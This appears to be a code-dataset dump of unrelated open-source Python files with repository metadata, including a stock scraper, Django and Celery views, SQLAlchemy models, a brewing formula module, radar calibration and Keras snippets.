url = 'http://finance.naver.com/item/sise_day.nhn?code={code}&page={page}'.format(code=code, page=page)
df = df.append(pd.read_html(url, header=0)[0], ignore_index=True)
# df = df.rename(columns={'종가':'end', '거래량' : 'vol'})
df = df.dropna()
print(df)
# mean_vol = df.vol.mean()
# df2 = df[['vol']]
# min_v = df2.min()
# max_v = df2.max()
# # print("min max : ", min_v, max_v)
# ratio_min_max = round((max_v / min_v), 1)
# # print("ratio : ", ratio_min_max)
# norm_df=(df2-df2.min())/(df2.max()-df2.min())
# norm_df.columns=['norm']
# stdev = norm_df.norm.std() # 종가 min-max 정규화 + 표준편차
# # mkt_sum = get_market_sum(code)
# if float(ratio_min_max) <= 5 :
# # if mean_vol >= 5000 and mean_vol <= 200000 :
# # if mkt_sum > 100 and mkt_sum < 1000 :
# df_last.loc[len(df_last)] = [code, float(ratio_min_max), int(mean_vol), stdev]
except :
pass
# df_last = df_last.sort_values(by=['ratio_min_max', 'stdev'], axis=0, ascending=[True, True]) # sorting by std(descending)
# df_last = df_last.reset_index(drop=True, inplace=False) # re-indexing
# df_last = df_last.head(100)
# print(df_last)
# a_item = []
# for i in range(len(df_last)) :
# a_item.append(df_last.code[i])
# f_hook = open("target.py",'w')
# date = "# DATE = " + get_now() + '\n'
# f_hook.write(date)
# data = "ITEMS = " + str(a_item)
# f_hook.write(data)
# f_hook.close()
# df_mkt_sum = pd.DataFrame(columns = ['code', 'mkt_sum'])
# for i in range(len(df_vol)) :
# print(i, '/', str(len(df_vol))
# try :
# code = df_vol.code[i]
# mkt_sum = get_market_sum(code)
# if mkt_sum < MKT_SUM_LIMIT:
# df_mkt_sum.loc[len(df_mkt_sum)] = [code, mkt_sum]
# except :
# pass
# item_list = []
# for i in range(len(df_mkt_sum)) :
# item_list.append(df_mkt_sum.code[i])
# print("itemlist : ", item_list)
def get_market_sum(item_code):
cnt_0_digit = 0
url = "https://finance.naver.com/item/main.nhn?code={}".format(item_code)
res = requests.get(url)
soup = BeautifulSoup(res.content, 'lxml')
result = soup.select('#_market_sum')[0].text.strip()
result = result.replace(',', '')
result = result.replace('\t', '')
result = result.replace('\n', '')
nextstr = []
lensum = len(result)
ptr = 0
for k in range(0, lensum):
if result[k] == '조':
ptr = k
break
nextstr.append(result[k])
if ptr != 0 :
cnt_0_digit = 4 - (lensum - (ptr + 1))
for m in range(0, cnt_0_digit) :
nextstr.append('0')
for n in range(ptr+1, lensum) :
nextstr.append(result[n])
market_sum = int("".join(nextstr))
return market_sum
def now() :
return datetime.datetime.now()
def get_now() :
year = strftime("%Y", localtime())
month = strftime("%m", localtime())
day = strftime("%d", localtime())
hour = strftime("%H", localtime())
cmin = strftime("%M", localtime())
sec = strftime("%S", localtime())
now = "[" + year + "/" + month +"/" + day + " " + hour + ":" + cmin + ":" + sec + "] "
return now
run() | [
"naikiki87@naver.com"
] | naikiki87@naver.com |
fc349d705b0189ad1053270e95c80c239f4eb299 | ddd4edc45481e6a7c7141b93e47b974634506d2d | /tradgram/relations/views.py | bbe4a68201ff6e95750b3b8fc9f79773aff38b99 | [
"MIT"
] | permissive | didils/tradgram | 407de9d05d01bc840c5c165155d370f092d82f0d | 4868ca082ab78a1b5b96f25ee9f958567bd1bb1e | refs/heads/master | 2021-11-19T02:47:02.224088 | 2019-04-05T08:19:14 | 2019-04-05T08:19:14 | 148,162,588 | 0 | 0 | MIT | 2021-09-08T00:57:43 | 2018-09-10T13:49:57 | Python | UTF-8 | Python | false | false | 2,304 | py | from rest_framework.views import APIView
from rest_framework.response import Response
from . import models, serializers
from rest_framework import status
from rest_framework.response import Response
from django.db.models import Q
class SaveRelations(APIView):
def post(self, request, format=None):
products = request.data['products']
products = products.split(",")
n = 0
while n < len(products):
relation_data = models.Relation.objects.all()
m = n+1
while m < len(products):
if relation_data.filter(product1=products[n], product2=products[m]):
asdf = relation_data.get(product1=products[n], product2=products[m])
asdf.count += 1
asdf.save()
print(products[n], '과', products[m], '의 카운트를', asdf.count-1, '에서', asdf.count, '로 증가!')
elif relation_data.filter(product1=products[m], product2=products[n]):
asdf = relation_data.get(product1=products[m], product2=products[n])
asdf.count += 1
asdf.save()
print(products[n], '과', products[m], '의 카운트를', asdf.count-1, '에서', asdf.count, '로 증가!')
elif products[m]==products[n]:
print('동일 제품끼리는 추가하지 않음!')
else:
models.Relation.objects.create(product1=products[m], product2=products[n], count=1)
print(products[n], '과', products[m], '관계를 새로 생성!')
m += 1
n += 1
return Response(status=status.HTTP_200_OK)
class Search(APIView):
def get(self, request, format=None):
product = request.query_params.get('product', None)
if product is not None:
relations = models.Relation.objects.filter(Q(product1 = product) | Q(product2 = product)).order_by('-count')[:6]
serializer = serializers.RelationSerializer(
relations, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_200_OK) | [
"didils1982@gmail.com"
] | didils1982@gmail.com |
f4e334423f8ad74045d4187afe8b37e6349897bd | 1302a788aa73d8da772c6431b083ddd76eef937f | /WORKING_DIRECTORY/system/connectivity/shill/test-scripts/check-rssi | be471cd6d11c2e3cb4f15c6c8284b8c971282bcc | [
"Apache-2.0"
] | permissive | rockduan/androidN-android-7.1.1_r28 | b3c1bcb734225aa7813ab70639af60c06d658bf6 | 10bab435cd61ffa2e93a20c082624954c757999d | refs/heads/master | 2021-01-23T03:54:32.510867 | 2017-03-30T07:17:08 | 2017-03-30T07:17:08 | 86,135,431 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | #!/usr/bin/python
import dbus, flimflam
flim = flimflam.FlimFlam(dbus.SystemBus())
strength = {}
for device in flim.GetObjectList("Device"):
device_properties = device.GetProperties(utf8_strings = True)
try:
if device_properties["Type"] not in ["wifi", "wimax",
"bluetooth", "cellular"]:
continue
except Exception, e:
continue
for network in flim.GetObjectList("Network", device_properties):
network_properties = network.GetProperties(utf8_strings = True)
if "Name" not in network_properties:
continue
name = network_properties["Name"]
if "Strength" not in network_properties:
print "No strength for network %s" % name
continue
if strength.get(name, -1) < network_properties["Strength"]:
strength[name] = network_properties["Strength"]
# print "%-14s: strength %d network %d" % \
# (name,
# int(strength.get(name, -1)),
# int(network_properties.get("Strength", -1)))
for service in flim.GetObjectList("Service"):
properties = service.GetProperties(utf8_strings = True)
if "Name" not in properties:
continue
name = properties["Name"]
print "%-14s: network %d service %d" % \
(name, int(strength.get(name, -1)), int(properties.get("Strength", -1)))
| [
"duanliangsilence@gmail.com"
] | duanliangsilence@gmail.com | |
c5238108e6febba12f1caef9a9a59e339fa335e7 | 86940be5343caf5bb67c68d8d08e59ec38ac5d08 | /searchengine/pipelines.py | 4da0b9bbb53ebbcd73d2ed0dd2af8d9945c714bc | [] | no_license | etmorefish/searchengine | 1b5c3c63be093962c123c7ec98694100d7b8c767 | ded67a48421293ccf16ba511c4aedb29096c3c25 | refs/heads/master | 2023-03-13T02:11:43.909686 | 2020-08-07T13:46:34 | 2020-08-07T13:46:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
class SearchenginePipeline(object):
def open_spider(self, spider):
client = pymongo.MongoClient(host='127.0.0.1', port=27017)
connection = client['search']
self.db = connection['result']
def process_item(self, item, spider):
try:
# print(item)
self.db.insert(dict(item))
# print('ok')
except Exception as e:
print(e)
print('数据存储异常.....')
return item
| [
"849078367@qq.com"
] | 849078367@qq.com |
0c30b5452c0eae9df947f0837c2e777b4a2cf52e | 6d562a86ea6c2c9186c20efef2857eb22d8c6e6a | /beerxml/formulas/gravity.py | 675074133e84f11ecc2e805307288af4a6c8f0bf | [] | no_license | rhblind/brewery | 9621469b4f3acd49153ca0c5cb350f1d600b7ce2 | 19385e61177ffd4353b3b31a9990293ebdad82d7 | refs/heads/master | 2020-12-24T14:46:11.604275 | 2012-10-26T20:07:51 | 2012-10-26T20:07:51 | 5,318,435 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,161 | py | # -*- coding: utf-8 -*-
#
# References:
# http://hbd.org/ensmingr/
# http://en.wikipedia.org/wiki/Brix
# http://realbeer.com/spencer/attenuation.html
# http://en.wikipedia.org/wiki/Gravity_(alcoholic_beverage)
# http://morebeer.com/brewingtechniques/library/backissues/issue2.1/manning.html
def plato_to_gravity(degrees_plato):
"""
Convert degrees plato to gravity.
"""
return 259.0 / (259.0 - degrees_plato)
def gravity_to_plato(gravity):
"""
Convert gravity to degrees plato.
"""
return 259.0 - (259.0 / gravity)
def gravity_to_brix(gravity):
"""
Convert gravity to degrees brix
"""
return (((182.4601 * gravity - 775.6821) * gravity \
+ 1262.7794) * gravity - 669.5622)
def brix_to_gravity(brix):
"""
Convert degrees brix to gravity
"""
# TODO: implement
pass
def specific_gravity(original_gravity, final_gravity):
"""
The percentage of alcohol can be calculated from the
difference between the original gravity of the wort
and the current specific gravity of wort.
"""
return ((1.05 * (original_gravity - final_gravity) / final_gravity) / 0.79)
def alcohol_by_volume(original_gravity, final_gravity):
"""
Calculate the Alcohol By Volume (ABV).
"""
return (original_gravity - final_gravity) / 0.75
def alcohol_by_weight(alcohol_by_volume, final_gravity=None):
"""
Calculate the Alcohol By Weight (ABW).
If the final gravity is not know, but has "normal" levels
of alcohol and attenuation, the ABW can be calculated
using this formula: (0.78 * alcohol_by_volume)
"""
if final_gravity is not None:
return (0.79 * alcohol_by_volume) / final_gravity
return (0.78 * alcohol_by_volume)
def true_extract(original_gravity, final_gravity):
"""
"""
return 0.1808 * original_gravity + 0.8192 * final_gravity
def alcohol_content():
pass
def apparent_attenuation():
pass
def true_attenuation(original_gravity, final_gravity):
"""
"""
return 1 - true_extract(original_gravity, final_gravity) \
/ original_gravity
def brewers_point():
pass | [
"rhblind@gmail.com"
] | rhblind@gmail.com |
a6588c6f4a3eaa2b458866a43b9dbad80177d400 | 92c47649185f2f41ec55997135a6c08ad1c83edd | /client/api/tasks.py | 0b3bfa63593ccb6456d45c91837a843f5320baaf | [] | no_license | imapex/collins | 6e4c4f739b859757ea9751d0f133552a0e05f215 | 4ab27e9b20124e2cf7755ac488ce472480545308 | refs/heads/master | 2021-01-19T13:56:24.864706 | 2017-05-23T06:00:37 | 2017-05-23T06:00:37 | 88,116,608 | 0 | 4 | null | 2017-05-23T06:00:38 | 2017-04-13T02:30:10 | Python | UTF-8 | Python | false | false | 633 | py | from __future__ import absolute_import, unicode_literals
import docker
from celery import Celery
import os
from .callbacks import TaskCallback
app = Celery('tasks', broker=os.getenv('RABBITMQ_URL'),
)
@app.task(bind=True)
def ping(self):
return "Pong"
@app.task
def run_image(jobId, image, command=None, **kwargs):
print("Executing Task for job id {}".format(jobId))
client = docker.from_env()
celery_result = client.containers.run(image, command=command, environment=kwargs)
# we need to pass jobid to the callback
collins_result = TaskCallback(jobId, celery_result)
return celery_result
| [
"kecorbin@cisco.com"
] | kecorbin@cisco.com |
75c6859352cb8e58f08963de7e6b326141e6eeca | 633ab8880dc367feefdb6ef565ed0e70a4094bc1 | /11000-12000/11653.py | dd622842b195630fe9e527b8eef32a3ffbedd058 | [] | no_license | winston1214/baekjoon | 2e9740ee2824d7777f6e64d50087b5c040baf2c6 | 20125255cd5b359023a6297f3761b2db1057d67d | refs/heads/master | 2023-03-04T09:07:27.688072 | 2021-02-16T13:51:49 | 2021-02-16T13:51:49 | 284,832,623 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | # @Author YoungMinKim
# baekjoon
import sys
import math
N = int(sys.stdin.readline())
num = 2
result = []
while N != 1:
if math.gcd(N,num) != 1:
result.append(num)
N = N // num
else:
num+=1
[print(x) for x in result] | [
"winston1214@naver.com"
] | winston1214@naver.com |
caa2120e0d08174a24dfb102246c86e31a3e2e9f | fa0a50e9a751d823590de6103582d8f5f5c62f11 | /Python3MyTeam/models/model.py | a8d1833b6be535ef8c39b9feda9fb878ec2947d7 | [] | no_license | haobin12358/MyTeam | b1b16f51ad534e53abe11c0841b94ce33fd9b23c | 9da9485b5586210cd6cfe0c98597851ad5bf2034 | refs/heads/master | 2021-09-09T15:11:21.126743 | 2018-02-27T17:01:54 | 2018-02-27T17:01:54 | 114,125,292 | 3 | 1 | null | 2018-02-27T17:01:55 | 2017-12-13T13:38:35 | Python | UTF-8 | Python | false | false | 5,737 | py | # *- coding:utf8 *-
# 兼容linux系统
import sys
import os
sys.path.append(os.path.dirname(os.getcwd())) # 增加系统路径
# 引用python类
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, create_engine, Integer, String, Text
import uuid
# 引用项目类
from Config import dbconfig as cfg
# 获取和mysql的连接引擎格式 "数据库://用户名:密码@ip(:端口号)/databse名(?charset=字符集)" ()里是可选内容
DB_PARAMS = "{0}://{1}:{2}@{3}/{4}?charset={5}".format(
cfg.sqlenginename, cfg.username, cfg.password, cfg.host, cfg.database, cfg.charset)
mysql_engine = create_engine(DB_PARAMS, echo=True)
# 实例化基础表,这个这个基础类可以关联到数据库的具体字段
Base = declarative_base()
# 用户表
class Uers(Base):
__tablename__ = "Users"
Uid = Column(String(64), primary_key=True)
Uname = Column(String(32), nullable=False)
Upwd = Column(String(32), nullable=False)
Utype = Column(Integer, nullable=False)
# 学生信息表
class Students(Base):
__tablename__ = "Students"
Sid = Column(String(64), primary_key=True)
Uid = Column(String(64), nullable=False)
Sname = Column(String(32), nullable=False)
Sno = Column(String(16), nullable=False)
Suniversity = Column(String(256), nullable=False)
Sschool = Column(String(256), nullable=False)
Stel = Column(String(16), nullable=False)
Sgrade = Column(Integer)
Ssex = Column(Integer)
# 教师信息表
class Teachers(Base):
__tablename__ = "Teachers"
Tid = Column(String(64), primary_key=True)
Uid = Column(String(64), nullable=False)
Tname = Column(String(16), nullable=False)
Tno = Column(String(16), nullable=False)
Ttel = Column(String(16), nullable=False)
Tuniversity = Column(String(256), nullable=False)
Tschool = Column(String(256), nullable=False)
Ttime = Column(Integer)
# 竞赛信息表
class Competitions(Base):
__tablename__ = "Competitions"
Cid = Column(String(64), primary_key=True)
Cname = Column(String(128), nullable=False)
Cno = Column(Integer, nullable=False)
Clevel = Column(Integer, nullable=False)
Cstart = Column(String(10), nullable=False)
Cend = Column(String(10), nullable=False)
Cmin = Column(Integer)
Cmax = Column(Integer)
Cown = Column(String(64))
Cabo = Column(Text, nullable=False)
# 团队表
class Teams(Base):
__tablename__ = "Teams"
TEid = Column(String(64), primary_key=True)
TEname = Column(String(256), nullable=False) # 团队名称
Cid = Column(String(64), nullable=False)
TEuse = Column(Integer, nullable=False) # 是否可用701可用,702不可用
TEnum = Column(Integer, nullable=False) # 团队人数限制,增加判断竞赛人数功能,默认为竞赛人数最大值,无最大值时显示0
# 团队学生关联表
class TStudent(Base):
__tablename__ = "TStudent"
TSid = Column(String(64), primary_key=True)
TEid = Column(String(64), nullable=False)
Sid = Column(String(64), nullable=False)
TStype = Column(Integer, nullable=False) # 成员类型 1000创建人 1001管理员 1002其他成员
TSsubject = Column(Integer, nullable=False) # 审批流程 1100待审核 1101已通过 1102已拒绝 1103已退出
# 团队教师关联表
class TTeacher(Base):
__tablename__ = "TTeacher"
TTid = Column(String(64), primary_key=True)
TEid = Column(String(64), nullable=False)
Tid = Column(String(64), nullable=False)
TTsubject = Column(Integer, nullable=False) # 审批流程 0待审核 1已通过 2已拒绝 3已退出
# 团队任务表
class TTasks(Base):
__tablename__ = "TTasks"
Tkid = Column(String(64), primary_key=True)
Tkname = Column(String(64), nullable=False) # 任务名称
Tkabo = Column(Text) # 任务详情
TEid = Column(String(64), nullable=False) # 关联团队id
Sid = Column(String(64), nullable=False) # 处理人
Tkstatus = Column(Integer, nullable=False) # 任务状态 0待处理 1已处理 2被驳回 3延期中 4已结束
Tktime = Column(String(64),nullable=False) # 创建时间 类型需要交流
# 个人信息表
class Perinfor(Base):
__tablename__ = "Perinfor"
Pid = Column(String(64), primary_key=True)
Uid = Column(String(64), nullable=False) # 消息发出者
Pmessage = Column(Text, nullable=False) # 消息内容
Pstatus = Column(Integer, nullable=False) # 消息处理状态 1201已读 1200未读
Ptype = Column(Integer) # 消息类型 901邀请 902任务 903通知 904其他 905申请
Cid = Column(String(64)) # 竞赛id
TEid = Column(String(64)) # 团队id
Sid = Column(String(64)) # 消息接收者
# 学生技能表
class STechs(Base):
__tablename__ = "STechs"
STid = Column(String(64), primary_key=True)
Sid = Column(String(64), nullable=False)
STname = Column(String(32), nullable=False)
STlevel = Column(Integer, nullable=False)
# 学生竞赛简历
class SCuse(Base):
__tablename__ = 'SCuse'
SCid = Column(String(64), primary_key=True)
Sid = Column(String(64), nullable=False)
SCname = Column(String(128), nullable=False)
SCno = Column(String(16), nullable=False)
# 教师竞赛简历
class TCuse(Base):
__tablename__ = 'TCuse'
TCid = Column(String(64), primary_key=True)
Tid = Column(String(64), nullable=False)
TCname = Column(String(128), nullable=False)
TCno = Column(String(16), nullable=False)
TCnum = Column(Integer, nullable=False, default=1)
if __name__ == "__main__":
'''
运行该文件就可以在对应的数据库里生成本文件声明的所有table
'''
Base.metadata.create_all(mysql_engine)
| [
"1276121237@qq.com"
] | 1276121237@qq.com |
ee745dd8260bfe9d95dad38b1f77a1c6886c85ab | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/94/usersdata/190/55854/submittedfiles/mediaLista.py | f68ec4e5da087edea75cb8878df08a8ca979fee4 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | # -*- coding: utf-8 -*-
n=int(input('digite n:'))
L=[]
for i in range (0,n,1):
m=int(input('digite o numero:'))
L.append(m)
print('%.2f' %L[0])
print('%.2f' %len(L)) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
9f597d5275098b7c4ed9415826fd77e8d0c6e922 | 25219f56a7958d2fdbd2c08172ef7b91e31e2b5a | /calibration_scalars/PFISR/201211/PINOT_Daytime31/20121112.007/gen_table.py | 83378f715a8872b38a87671b832bd8115f9b6256 | [] | no_license | amisr/overspread | d82d3adc8f6d4981b3b13f54e39e69411711e3ee | c26a736c9b356f55fd7845ad5a093504e684f434 | refs/heads/main | 2023-04-03T10:47:13.975207 | 2021-03-30T23:43:22 | 2021-03-30T23:43:22 | 431,037,982 | 1 | 0 | null | 2021-11-23T19:02:13 | 2021-11-23T09:29:47 | Python | UTF-8 | Python | false | false | 2,880 | py | import datetime
import os
import numpy
import scipy
import matplotlib.pyplot as plt
import tables
from scipy.optimize import leastsq
import scipy.io as sio
def get_BS_angle(az,el):
az_bs = 15.0*scipy.pi/180.0
el_bs = 74.0*scipy.pi/180.0
k = numpy.array([[scipy.cos(el)*scipy.cos(az)],
[scipy.cos(el)*scipy.sin(az)],
[scipy.sin(el)]])
tk = rotmat(k,3,az_bs)
tk2 = rotmat(tk,2,scipy.pi/2.0-el_bs)
alphaBS=90.0-scipy.arcsin(tk2[2])*180.0/scipy.pi
return alphaBS
def rotmat(input, dir, angle):
if dir == 1:
rotmat = numpy.array([ [1,0,0],
[0, scipy.cos(angle), scipy.sin(angle)],
[0, -scipy.sin(angle), scipy.cos(angle)]])
if dir == 2:
rotmat = numpy.array([ [scipy.cos(angle), 0, -scipy.sin(angle)],
[0, 1, 0],
[scipy.sin(angle), 0, scipy.cos(angle)]])
if dir == 3:
rotmat = numpy.array([ [scipy.cos(angle), scipy.sin(angle), 0],
[-scipy.sin(angle), scipy.cos(angle), 0],
[0, 0, 1]])
return scipy.dot(rotmat,input)
if __name__ == '__main__':
now = datetime.datetime.now()
date = now.strftime("%m.%d.%Y")
#change experiment month here
exp = 'cal-201211'
#
dat = sio.loadmat('cal-201211-filelist_lp.txt_1.72_4.24-11.13.2012.mat')
x = dat['x'][0]
h5file = tables.openFile('bm_orig.h5', mode = 'r')
output={}
for array in h5file.listNodes('/',classname = 'Array'):
output[array.name]=array.read()
for group in h5file.walkGroups("/"):
output[group._v_pathname]={}
for array in h5file.listNodes(group, classname = 'Array'):
output[group._v_pathname][array.name]=array.read()
h5file.close()
BeamcodeMap = output['/']['BeamcodeMap']
BeamcodeMap = numpy.array(BeamcodeMap, dtype='float')
Nbeams = numpy.shape(BeamcodeMap)[0]
fid = open('%s-calibration-scalar-%s.txt' %(exp,date),'w')
fid2 = open('%s-calibration-ksys-%s.txt' %(exp,date),'w')
for ibm in range(Nbeams):
tbm = BeamcodeMap[ibm][:]
az = BeamcodeMap[ibm][1]*scipy.pi/180.0
el = BeamcodeMap[ibm][2]*scipy.pi/180.0
kold = BeamcodeMap[ibm][3]
alphaBS = get_BS_angle(az,el)
ksys = x[0]*scipy.power(scipy.cos(alphaBS[0]*scipy.pi/180.0+x[2]),x[1])*1e-19
ksysCorr = ksys/kold
print tbm[0],tbm[1],tbm[2],ksys,ksysCorr
fid.write('%d %2.2f %2.2f %2.2e %3.5f\n' %(tbm[0],tbm[1],tbm[2],ksys,ksysCorr))
fid2.write('%d %2.2f %2.2f %2.2e\n'%(tbm[0],tbm[1],tbm[2],ksys))
fid.close()
fid2.close()
| [
"fitter@heaviside.local"
] | fitter@heaviside.local |
d272909ba46b4446125741d29717f01291f029bb | 3024cafafbfc75193105af7f225d3b12eb2aea46 | /DjangoRestFrameworkProjects/withoutrest/project13/testapp/mixins.py | f2239ae24ff6418f2d1cdad792b139ac595dc62a | [] | no_license | jaishankarg24/Django-Rest-Framework | 33266f6825d51abb8a512426baedf59f2ee957c8 | 809ee9208ffbef4202a8f4058a84f5322793af52 | refs/heads/master | 2023-03-02T20:56:38.051060 | 2021-02-12T05:37:48 | 2021-02-12T05:37:48 | 338,233,009 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | from django.http import HttpResponse
class MixinHttpResponse(object):
def render_to_http_response(self,json_data,status=200):
#1000 lines of code
return HttpResponse(json_data,content_type='application/json',status=status) | [
"jaishankarg24@gmail.com"
] | jaishankarg24@gmail.com |
b06882ef3fd5d1406945a64879ce78927ecac83e | fbff56cc280bc2d032fa50c457a07e1a550035a6 | /codeDotOrg/tokenParser.py | 63b32148c9d8f242ccbce574b508ba761126c982 | [] | no_license | mhw32/cs398-hw4-boilerplate | 60b59a856389750b5723a0aa592b807dca98464a | f920e3562c901521a5f3dd919ad58c455d666658 | refs/heads/master | 2020-08-24T18:07:08.624994 | 2019-10-22T19:46:38 | 2019-10-22T19:46:38 | 216,878,667 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py |
# isalnum
# isalpha
# isdigit
# isspace (all whitespace)
def parse(code):
tokens = []
curr = ''
for i, ch in enumerate(code):
if str.isalnum(ch) or ch in ['.'] or (ch in ['+', '-'] and
code[i-1] != 'i' and
code[i+1] != 'i'):
curr += ch
else:
if curr != '':
tokens.append(curr)
curr = ''
if not str.isspace(ch):
tokens.append(ch)
return TokenStack(tokens)
| [
"me@mikewuis.me"
] | me@mikewuis.me |
631cbba81289f8ea79e44776cc21f6318decc581 | 772a82205af92d2f2d2b490ac6bc23fdb7456124 | /algorithm/328.odd-even-linked-list.py | bf0568e35cdbdd3b55bbb2504f4378a31c4088fd | [] | no_license | atashi/LLL | 4f777b3a06c6ed38eab4323d2072dbbec22eee92 | 857b8c7fccfe8216da59228c1cf3675444855673 | refs/heads/master | 2021-05-17T10:11:28.946779 | 2019-11-25T15:56:14 | 2019-11-25T15:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,740 | py | #
# @lc app=leetcode id=328 lang=python
#
# [328] Odd Even Linked List
#
# https://leetcode.com/problems/odd-even-linked-list/description/
#
# algorithms
# Medium (48.41%)
# Total Accepted: 137.7K
# Total Submissions: 284.3K
# Testcase Example: '[1,2,3,4,5]'
#
# Given a singly linked list, group all odd nodes together followed by the even
# nodes. Please note here we are talking about the node number and not the
# value in the nodes.
#
# You should try to do it in place. The program should run in O(1) space
# complexity and O(nodes) time complexity.
#
# Example 1:
#
#
# Input: 1->2->3->4->5->NULL
# Output: 1->3->5->2->4->NULL
#
#
# Example 2:
#
#
# Input: 2->1->3->5->6->4->7->NULL
# Output: 2->3->6->7->1->5->4->NULL
#
#
# Note:
#
#
# The relative order inside both the even and odd groups should remain as it
# was in the input.
# The first node is considered odd, the second node even and so on ...
#
#
#
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def oddEvenList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head:
return head
total = 1
last = head
while last.next:
last = last.next
total += 1
h = head
i = 1
while i <= total // 2 and h.next.next:
# 取出下一个节点,不破坏链表结构
next = h.next
h.next = h.next.next
# 取出节点放到最后
last.next = next
last = last.next
last.next = None
h = h.next
i += 1
return head
| [
"rebornwwp@gmail.com"
] | rebornwwp@gmail.com |
e0411f9aea4f6301de1ac641f63beb2d395d2066 | 5fe72bb13baf3649058ebe11aa86ad4fc56c69ed | /hard-gists/c2dfe5772ba3cd16c1be17ba42b7db66/snippet.py | 89eaab37e4cfdb72ae5f1a42a153558079917d50 | [
"Apache-2.0"
] | permissive | dockerizeme/dockerizeme | 8825fed45ff0ce8fb1dbe34959237e8048900a29 | 408f3fa3d36542d8fc1236ba1cac804de6f14b0c | refs/heads/master | 2022-12-10T09:30:51.029846 | 2020-09-02T13:34:49 | 2020-09-02T13:34:49 | 144,501,661 | 24 | 20 | Apache-2.0 | 2022-11-21T12:34:29 | 2018-08-12T21:21:04 | Python | UTF-8 | Python | false | false | 1,453 | py | # In Keras the Convolution layer requirest an additional dimension which will be used for the various filter.
# When we have eg. 2D dataset the shape is (data_points, rows, cols).
# But Convolution2D requires shape (data_points, rows, cols, 1).
# Otherwise it fails with eg. "Exception: Input 0 is incompatible with layer convolution2d_5: expected ndim=4, found ndim=3"
#
# Originally I reshaped the data beforehand but it only complicates things.
#
# An easier and more elegant solution is to add a Reshape layer at the input
# of the network!
#
# Docs: https://keras.io/layers/core/#reshape
from keras.models import Sequential, Model
from keras.layers import Input
from keras.layers.core import Activation, Reshape
from keras.layers.convolutional import Convolution2D
# eg. 100x100 px images
input_shape = (100, 100)
def create_model_sequential(input_shape):
"""For the classic sequential API..."""
model = Sequential()
# add one more dimension for convolution
model.add(Reshape(input_shape + (1, ), input_shape=input_shape))
model.add(Convolution2D(32, 3, 3))
model.add(Activation('relu'))
# ...
return model
def create_model_functional(input_shape):
"""For the new functional API..."""
inputs = Input(input_shape)
# add one more dimension for convolution
x = Reshape(input_shape + (1, ), input_shape=input_shape)(inputs)
x = Convolution2D(32, 3, 3)(x)
x = Activation('relu')(x)
# ...
return Model(inputs, x) | [
"42325807+dockerizeme@users.noreply.github.com"
] | 42325807+dockerizeme@users.noreply.github.com |
07e55e70ea6f8d74d49765d772a15634402f7eee | 5f6c16e89cf58304c2e70f1e34f14110fcec636c | /python-swagger-sdk/swagger_client/models/block_query.py | 4f5f343b148da55abbcd418fed36c44394686a8a | [] | no_license | mohammedpatla/secretapi | 481c97901a5e92ca02e29470ab683df80ea0f26a | df420498bd0ae37fd1a152c3877a1342275a8f43 | refs/heads/master | 2022-12-25T01:55:18.038954 | 2020-10-04T23:13:54 | 2020-10-04T23:13:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,774 | py | # coding: utf-8
"""
API for Secret Network by ChainofSecrets.org
A REST interface for state queries, transaction generation and broadcasting. # noqa: E501
OpenAPI spec version: 3.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class BlockQuery(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'block_meta': 'BlockQueryBlockMeta',
'block': 'Block'
}
attribute_map = {
'block_meta': 'block_meta',
'block': 'block'
}
def __init__(self, block_meta=None, block=None): # noqa: E501
"""BlockQuery - a model defined in Swagger""" # noqa: E501
self._block_meta = None
self._block = None
self.discriminator = None
if block_meta is not None:
self.block_meta = block_meta
if block is not None:
self.block = block
@property
def block_meta(self):
"""Gets the block_meta of this BlockQuery. # noqa: E501
:return: The block_meta of this BlockQuery. # noqa: E501
:rtype: BlockQueryBlockMeta
"""
return self._block_meta
@block_meta.setter
def block_meta(self, block_meta):
"""Sets the block_meta of this BlockQuery.
:param block_meta: The block_meta of this BlockQuery. # noqa: E501
:type: BlockQueryBlockMeta
"""
self._block_meta = block_meta
@property
def block(self):
"""Gets the block of this BlockQuery. # noqa: E501
:return: The block of this BlockQuery. # noqa: E501
:rtype: Block
"""
return self._block
@block.setter
def block(self, block):
"""Sets the block of this BlockQuery.
:param block: The block of this BlockQuery. # noqa: E501
:type: Block
"""
self._block = block
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(BlockQuery, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
